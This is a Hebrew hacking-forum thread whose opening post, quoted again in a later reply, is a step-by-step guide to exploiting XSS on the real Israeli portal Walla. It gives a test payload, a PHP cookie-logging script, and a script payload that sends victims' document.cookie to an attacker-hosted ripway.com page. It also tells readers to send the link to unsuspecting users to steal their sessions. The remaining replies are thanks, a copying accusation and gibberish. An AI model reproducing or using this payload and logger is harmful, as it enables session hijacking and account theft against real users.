קהילות פורומים, הורדות, יעוץ ותמיכה


אשכולות דומים

  1. [מדריך]מדריך בסיסי לאיזיטון
    על ידי B1ackSn0w בפורום פלאש ואנימציה
    תגובות: 2
    הודעה אחרונה: 01-08-2008, 13:24
  2. מדריך|מדריך בסיסי לפיווט!
    על ידי EyalusH בפורום פלאש ואנימציה
    תגובות: 4
    הודעה אחרונה: 22-03-2008, 17:58
  3. מדריך בסיסי לhtml
    על ידי -עדי- בפורום תיכנות ובניית אתרים
    תגובות: 0
    הודעה אחרונה: 30-08-2007, 12:53
  4. מדריך בסיסי לתוכנה Windows Movie Maker עריכת וידאו
    על ידי good+2 בפורום ארכיון מדריכים
    תגובות: 0
    הודעה אחרונה: 25-02-2007, 22:16
  5. מדריך בסיסי לשימוש ב ALCOHOL 120%+ צריבה
    על ידי CrAzY_BoY בפורום ארכיון מדריכים
    תגובות: 2
    הודעה אחרונה: 13-01-2006, 15:59
+ תגובה לנושא
מציג תוצאות 1 עד 7 מתוך 7

מדריך בסיסי (XSS)

  1. #1
    משתמש מתחיל
    תאריך הצטרפות
    11/2010
    הודעות
    59
    לייקים
    0
    נקודות
    0
    מין: זכר

    ברירת מחדל מדריך בסיסי (XSS)

    שלום כולם החלטתי ליכתוב מדריך בנושא xss קצת לשנות בימקום כל הזמן sqli.

    קודם כל אני ממליץ קצת ליקרוא על xss נוכל להבין כי אני לא יסביר הכל אלה רק את הבסיס תחפשו חומר על זה בגוגל משהו.
    לאחר שאתם יודעים קצת על זה נוכל להמשיך במדריך:

    לצורך המדריך אני ידגים על וואלה. אוקי קודם כל מציאת חור xss איך מוצאים??
    כדי לימצוא חור xss אנחנו צריכים לחפש בכל מיני משבצות חיפוש הכוונה נגיד בהרשמה,חיפוש באתר ועוד.... נגיד בוואלה נלך לאפשריות קרא דואר ואז להרשמת חשבון חדש,נירשום את הקוד הבא במישבצת של שם מישתמש: קוד PHP:
    <script>alert("xss")</script>

    לאחר שרשמנו זה יציג לנו חלון alert שבתוכו המילה xss זה אומר שיש חור xss עכשיו בטח מה שאתם רוצים לדעת איך נוכל לנצל אותו ומה ביכולתינו לעשות??
    לדוגמא אפשר לעשות דפייס ועוד כמה דברים אבל אני לא יפרט על הכל אני יסביר על גניבת הקוקיז של מישתמשים(עוגיות).
    איך בעצם ניגנוב את העוגיות?? ניפתח מסמך טקסט חדש ונירשום בו:
    קוד PHP:
    <?php
    $cookie
    = $_GET['c'];
    $ip = getenv ('REMOTE_ADDR');
    $date=date("m/d/Y g:i:s a");
    $referer= getenv ('HTTP_REFERER');
    $fl = fopen('send.txt', 'a');
    fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer."\n".$cookie."\n");
    fclose($fl);
    ?>

    ניקרא לו test.php נכין מיסמך טקסט חדש וניקרא לו send.txt ונכניס בו את המילה bla נעלה את שני הקבצים לשרת האיחסון שלנו לדוגמא ripway
    עכשיו נחזור לוואלה ונכניס את הקוד הבא במקום שיש את הפריצה(במישבצת של שם מישתמש):
    קוד PHP:
    <script>document.location.href="www.example.co.il/test.php?cookie="+document.cookie</script>

    עכשיו ב www.example.co.il תכניסו תכתובת של האיחסון של הקובץ test.php שהעלינו נגיד ב ripway סתם לדוגמא :
    קוד PHP:
    http://h1.ripway.com/myxss/test.php

    אז נכניס את זה בקוד ככה:
    קוד PHP:
    <script>document.location.href="http://h1.ripway.com/myxss/test.php?cookie="+document.cookie</script>

    לאחר שהכנסו את הקוד זה יעביר אותנו לדף שגונב עוגיות אתם כבר תיראו זה יעביר אותכם לדף ריק אם כתובת ארוכה אז אתם מעתיקים אותה ושולחים אותה לילדים וברגע שהם ניכנסו תיכנסו לקובץ send.txt ואתם תיראו תעוגיות שלהם(מישתמשים שלהם בוואלה)
    קרדיט לBuk4 על הקוד php(הקוד של ה send.txt) ועל הכנת המדריך קרדיט לי

  2. קישורים ממומנים

  3. #2
    משתמש מתקדם האוואטר של Zer0Day
    תאריך הצטרפות
    01/2011
    גיל
    36
    הודעות
    827
    לייקים
    6
    נקודות
    98
    מין: זכר

    ברירת מחדל

    תודה רבה .



  4. #3
    משתמש מתקדם
    שם פרטי
    אריאל
    תאריך הצטרפות
    08/2010
    הודעות
    829
    לייקים
    65
    נקודות
    49
    משפט מחץ
    (-:
    מין: זכר

    ברירת מחדל

    דייי איזה מעתיקן אין דברים כאלהה

    http://www.iatraf.co.il/showthread.p...%A1%D7%99+(XSS)


  5. #4
    משתמש מתחיל
    תאריך הצטרפות
    11/2010
    הודעות
    59
    לייקים
    0
    נקודות
    0
    מין: זכר

    ברירת מחדל

    לא העתקתי אני זה ROEE147

  6. #5
    מורחקים
    תאריך הצטרפות
    05/2012
    הודעות
    190
    לייקים
    0
    נקודות
    0
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי UnioN-ofSite צפיה בהודעה
    שלום כולם החלטתי ליכתוב מדריך בנושא xss קצת לשנות בימקום כל הזמן sqli.

    קודם כל אני ממליץ קצת ליקרוא על xss נוכל להבין כי אני לא יסביר הכל אלה רק את הבסיס תחפשו חומר על זה בגוגל משהו.
    לאחר שאתם יודעים קצת על זה נוכל להמשיך במדריך:

    לצורך המדריך אני ידגים על וואלה. אוקי קודם כל מציאת חור xss איך מוצאים??
    כדי לימצוא חור xss אנחנו צריכים לחפש בכל מיני משבצות חיפוש הכוונה נגיד בהרשמה,חיפוש באתר ועוד.... נגיד בוואלה נלך לאפשריות קרא דואר ואז להרשמת חשבון חדש,נירשום את הקוד הבא במישבצת של שם מישתמש: קוד PHP:
    <script>alert("xss")</script>

    לאחר שרשמנו זה יציג לנו חלון alert שבתוכו המילה xss זה אומר שיש חור xss עכשיו בטח מה שאתם רוצים לדעת איך נוכל לנצל אותו ומה ביכולתינו לעשות??
    לדוגמא אפשר לעשות דפייס ועוד כמה דברים אבל אני לא יפרט על הכל אני יסביר על גניבת הקוקיז של מישתמשים(עוגיות).
    איך בעצם ניגנוב את העוגיות?? ניפתח מסמך טקסט חדש ונירשום בו:
    קוד PHP:
    <?php
    $cookie
    = $_GET['c'];
    $ip = getenv ('REMOTE_ADDR');
    $date=date("m/d/Y g:i:s a");
    $referer= getenv ('HTTP_REFERER');
    $fl = fopen('send.txt', 'a');
    fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer."\n".$cookie."\n");
    fclose($fl);
    ?>

    ניקרא לו test.php נכין מיסמך טקסט חדש וניקרא לו send.txt ונכניס בו את המילה bla נעלה את שני הקבצים לשרת האיחסון שלנו לדוגמא ripway
    עכשיו נחזור לוואלה ונכניס את הקוד הבא במקום שיש את הפריצה(במישבצת של שם מישתמש):
    קוד PHP:
    <script>document.location.href="www.example.co.il/test.php?cookie="+document.cookie</script>

    עכשיו ב www.example.co.il תכניסו תכתובת של האיחסון של הקובץ test.php שהעלינו נגיד ב ripway סתם לדוגמא :
    קוד PHP:
    http://h1.ripway.com/myxss/test.php

    אז נכניס את זה בקוד ככה:
    קוד PHP:
    <script>document.location.href="http://h1.ripway.com/myxss/test.php?cookie="+document.cookie</script>

    לאחר שהכנסו את הקוד זה יעביר אותנו לדף שגונב עוגיות אתם כבר תיראו זה יעביר אותכם לדף ריק אם כתובת ארוכה אז אתם מעתיקים אותה ושולחים אותה לילדים וברגע שהם ניכנסו תיכנסו לקובץ send.txt ואתם תיראו תעוגיות שלהם(מישתמשים שלהם בוואלה)
    קרדיט לBuk4 על הקוד php(הקוד של ה send.txt) ועל הכנת המדריך קרדיט לי
    באג XSS

    http://www.doctors.co.il/forum-146/message-315256

    סתם בצחוק איזה טמבל ניסה להזריק דרך התגובות

  7. #6
    משתמש מתחיל
    שם פרטי
    B.H.T
    תאריך הצטרפות
    11/2012
    גיל
    36
    הודעות
    21
    לייקים
    0
    נקודות
    0
    מין: זכר

    ברירת מחדל

    YJHRDT

  8. #7
    משתמש מתחיל
    שם פרטי
    B.H.T
    תאריך הצטרפות
    11/2012
    גיל
    36
    הודעות
    21
    לייקים
    0
    נקודות
    0
    מין: זכר

    ברירת מחדל

    FDXGMFJ

+ תגובה לנושא


הרשאות פרסום

  • אין באפשרותך לפרסם נושאים חדשים
  • אין באפשרותך לפרסם תגובות
  • אין באפשרותך לצרף קבצים
  • אין באפשרותך לערוך את הודעותיך


כל הזמנים הם לפי GMT +3. השעה כרגע היא 21:31.
מופעל על ידי vBulletin™ © גרסה 4.1, 2011 vBulletin Solutions, Inc. כל הזכויות שמורות.
פעילות הגולשים
אומנות וגרפיקה
מוזיקה
ספורט
סדרות טלוויזיה
סרטים וקולנוע
קנייה ומכירה
רשתות חברתיות
הבורר 3
פורומי פנאי ובידור
סרטים
סדרות
משחקים
דיבורים
אקטואליה
בעלי חיים
בדיחות והומור
משחקי ספורט
הבורר
מחשבים וטכנולוגיה
תמיכה טכנית
חומרה ומודינג
תוכנות להורדה
סלולארי וגאדג'טים
רקעים למחשב
ציוד הקפי למחשב
אבטחת מידע
תכנות ובניית אתרים
כסף ברשת
אייפון
בריאות ואורח חיים
כושר ופיתוח גוף
דיאטה
צבא וגיוס
יעוץ מיני
מה שבלב
אומנות הפיתוי
יהדות
מיסטיקה ורוחניות
אתאיזם ודתות

נושאים: 2,512,586 | הודעות: 8,213,179 | משתמשים: 315,603 | המשתמש החדש ביותר: upizijoj | עיצוב גרפי: סטודיו עודד בביוף | קידוד: rellect